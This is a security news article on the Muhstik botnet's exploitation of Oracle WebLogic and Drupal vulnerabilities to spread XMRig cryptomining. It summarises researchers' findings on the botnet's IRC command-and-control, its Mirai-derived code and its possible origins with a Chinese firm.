Muhstik Botnet Targets Flaws in Oracle WebLogic, DrupalResearchers: Malware Leverages Vulnerabilities to Mine Cryptocurrency
The Muhstik botnet, which has been operating for at least two years, has recently started targeting vulnerabilities in the Oracle WebLogic application server and the Drupal content management system as a way to expand its cryptocurrency mining capabilities, according to security firm Lacework.
Earlier, researchers had found that Muhstik targeted vulnerable IoT devices, such as routers, to grow its malicious network and perform other tasks, such as mining for cryptocurrency or launching distributed denial-of-service attack.
Now, the operators behind Muhstik are targeting vulnerabilities in web applications to increase the botnet's reach. This includes two vulnerabilities in Oracle WebLogic, which is used to help build and deploy enterprise Java EE applications. Those flaws are tracked as CVE-2019-2725 and CVE-2017-10271. Also targeted is a remote code execution vulnerability in Drupal tracked as CVE-2018-7600.
One of the Oracle WebLogic vulnerabilities, CVE-2019-2725, was disclosed over a year ago, when researchers from Palo Alto Networks Unit 42 warned that it could be used to mine for cryptocurrency or deploy ransomware.
The Lacework researchers note that Muhstik continues to use the IRC protocol to communicate with its command-and-control server, which is fairly common for botnets (see: The Hacker Battle for Home Routers).
After taking advantage of vulnerabilities in either connected devices or web applications, the botnet first downloads a payload called "pty" and then tries to establish a connection with the command-and-control server over the IR protocol, according to the Lacework report.
Muhstik then attempts to download other malicious code within the infected device or web application. This includes the XMRig malware that is being increasingly used to mine for cryptocurrency, such as monero (see: Kubeflow Targeted in XMRig Monero Cryptomining Campaign).
The botnet also attempts to download a scanning module that searches for other vulnerable applications or connected devices and then attempts to connect those to its malicious infrastructure, according to the report.
"Usually, Muhstik will be instructed to download an XMRig miner and a scanning module. The scanning module is used for growing the botnet through targeting other Linux servers and home routers," Chris Hall, a cloud security researcher at Lacework, notes in the report.
The researchers also found the Muhstik botnet leverages source code from the Mirai botnet. This includes a memory scraper, which can kill other malware within a device (see: Even in Test Mode, New Mirai Variant Infecting IoT Devices).
The Lacework researchers found hints that the botnet might have its origins in China.
All of Muhstik's original malware variants had been uploaded to VirusTotal before the first attacks were spotted in the wild in 2018, according to the report. Those malware variant strings contain the word "shenzhouwangyun," which appears to be a reference to a Chinese forensics firm called Shen Zhou Wang Yun Information Technology Co. Ltd., according to the report.
Other security researchers have noted that this company is suspected of developing other types of malware such as HiddenWasp, a Linux-based Trojan.
"Also, the original specimens were only uploaded one time, suggesting Shen Zhou Wang Yun is likely the malware originator and not simply the first uploader," Hall notes in the report. "One of the uploads (.x_3sh) had zero detections and appears to be the first Muhstik downloader."